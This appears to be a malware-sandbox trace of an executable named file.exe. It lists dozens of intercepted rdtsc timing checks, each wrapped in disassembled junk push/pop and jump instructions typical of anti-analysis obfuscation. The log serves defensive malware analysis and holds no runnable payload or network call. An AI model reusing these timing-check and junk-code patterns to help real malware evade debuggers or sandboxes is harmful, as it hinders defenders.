                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E3A0A second address: 8E3A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E3A1B second address: 8C9783 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8481503876h 0x0000000c jc 00007F8481503866h 0x00000012 popad 0x00000013 popad 0x00000014 nop 0x00000015 sub cx, 1441h 0x0000001a call dword ptr [ebp+122D20AFh] 0x00000020 pushad 0x00000021 jns 00007F8481503868h 0x00000027 push edi 0x00000028 jbe 00007F8481503866h 0x0000002e pop edi 0x0000002f popad 0x00000030 push esi 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F848150386Dh 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B214 second address: 92B23B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F848074392Dh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 jbe 00007F848074392Eh 0x0000001b push eax 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B23B second address: 92B23F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B6B7 second address: 92B6BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B6BD second address: 92B6C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B6C3 second address: 92B6D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Bh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B829 second address: 92B82D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B82D second address: 92B831 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B831 second address: 92B839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B839 second address: 92B881 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jg 00007F8480743926h 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007F8480743934h 0x00000016 push edx 0x00000017 pop edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pushad 0x0000001e pushad 0x0000001f jmp 00007F8480743938h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B881 second address: 92B88A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B88A second address: 92B88E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BCA1 second address: 92BCA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BCA5 second address: 92BCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BCAB second address: 92BCB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BCB1 second address: 92BCB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BCB7 second address: 92BCBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BCBB second address: 92BCD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F848074392Bh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F308 second address: 92F311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92EBC6 second address: 92EBCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92EE8A second address: 92EE94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8481503866h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92EE94 second address: 92EE98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92EFE1 second address: 92F009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jbe 00007F848150386Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8481503871h 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F009 second address: 92F00F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F00F second address: 92F022 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F848150386Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F022 second address: 92F02F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F8480743932h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9314E4 second address: 9314E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9314E9 second address: 931507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480743938h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 931507 second address: 931512 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932F8C second address: 932F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 936EF5 second address: 936F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F848150386Ch 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 937172 second address: 937176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93776D second address: 937775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 937775 second address: 93779A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F8480743939h 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93779A second address: 9377A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9377A0 second address: 9377A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93C3E7 second address: 93C3FE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007F8481503866h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93C547 second address: 93C551 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93C551 second address: 93C559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93C559 second address: 93C55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93C6DD second address: 93C6E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93C6E1 second address: 93C6E7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93C9AC second address: 93C9B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93C9B0 second address: 93C9BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push esi 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93CB25 second address: 93CB47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8481503878h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93CB47 second address: 93CB7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007F8480743940h 0x0000000b popad 0x0000000c jc 00007F848074393Eh 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 896756 second address: 89675B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89675B second address: 8967B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8480743938h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F8480743937h 0x00000014 jns 00007F8480743926h 0x0000001a jmp 00007F8480743932h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8967B1 second address: 8967BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8481503866h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8967BB second address: 8967C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8967C3 second address: 8967F0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8481503872h 0x00000008 pushad 0x00000009 jmp 00007F8481503876h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9410A8 second address: 9410B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8480743926h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9410B3 second address: 9410B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9410B9 second address: 9410BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9410BF second address: 9410DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503870h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941677 second address: 94168E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480743931h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94168E second address: 9416C7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jne 00007F8481503872h 0x00000011 push edi 0x00000012 jmp 00007F8481503879h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 948209 second address: 94820F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9483E4 second address: 9483F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9483F2 second address: 948406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F848074392Bh 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 948980 second address: 948988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 948988 second address: 94898D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94898D second address: 9489B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F848150386Dh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9489B4 second address: 9489BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F8480743926h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 948CBA second address: 948CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F8481503872h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 948CD1 second address: 948CF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F8480743926h 0x00000009 pushad 0x0000000a popad 0x0000000b jnl 00007F8480743926h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8480743934h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94958C second address: 9495CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F848150386Ah 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8481503874h 0x00000016 jmp 00007F8481503874h 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9495CA second address: 9495CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94985A second address: 94985E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 949B56 second address: 949B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 949B5A second address: 949B66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F8481503866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 949DF5 second address: 949DFF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 949DFF second address: 949E0A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007F8481503866h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 949E0A second address: 949E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 js 00007F848074392Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95023B second address: 95023F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 954365 second address: 9543A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F848074392Ah 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 js 00007F848074392Eh 0x00000018 jo 00007F8480743926h 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jp 00007F848074393Bh 0x00000029 jmp 00007F8480743935h 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9543A3 second address: 9543A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9543A9 second address: 9543AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 953503 second address: 95351E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jns 00007F8481503866h 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 jnc 00007F8481503866h 0x0000001a popad 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95351E second address: 953526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 953526 second address: 95352A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 953984 second address: 953992 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 953992 second address: 953996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 953996 second address: 95399A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 953AE6 second address: 953B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F8481503879h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e jp 00007F848150386Ch 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jl 00007F848150386Eh 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 953B21 second address: 953B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 953C83 second address: 953C8D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8481503866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C2E6 second address: 95C311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F8480743933h 0x0000000a jnl 00007F8480743926h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007F8480743926h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C311 second address: 95C315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C315 second address: 95C319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95A673 second address: 95A677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95A677 second address: 95A680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95A680 second address: 95A68A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95A68A second address: 95A68F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95ABC8 second address: 95ABE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8481503872h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95ABE6 second address: 95ABFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F848074392Ah 0x0000000a popad 0x0000000b jc 00007F848074392Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95AE97 second address: 95AE9C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
